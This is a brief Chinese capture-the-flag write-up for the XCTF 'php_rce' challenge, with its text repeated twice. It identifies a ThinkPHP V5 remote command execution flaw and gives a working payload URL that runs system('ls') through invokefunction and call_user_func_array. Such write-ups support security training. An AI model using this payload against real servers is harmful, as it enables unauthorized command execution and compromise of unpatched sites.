攻防世界-WEB-php_rce
打开靶机链接
搜村ThinkPhP V5存在远程命令执行的漏洞
构建payload
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
查询当前目录文件,没有发现flag。调整payload
得到flag文件,修改执行的命令
这样就可以拿到flag
打开靶机链接
搜村ThinkPhP V5存在远程命令执行的漏洞
构建payload
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
查询当前目录文件,没有发现flag。调整payload
得到flag文件,修改执行的命令
这样就可以拿到flag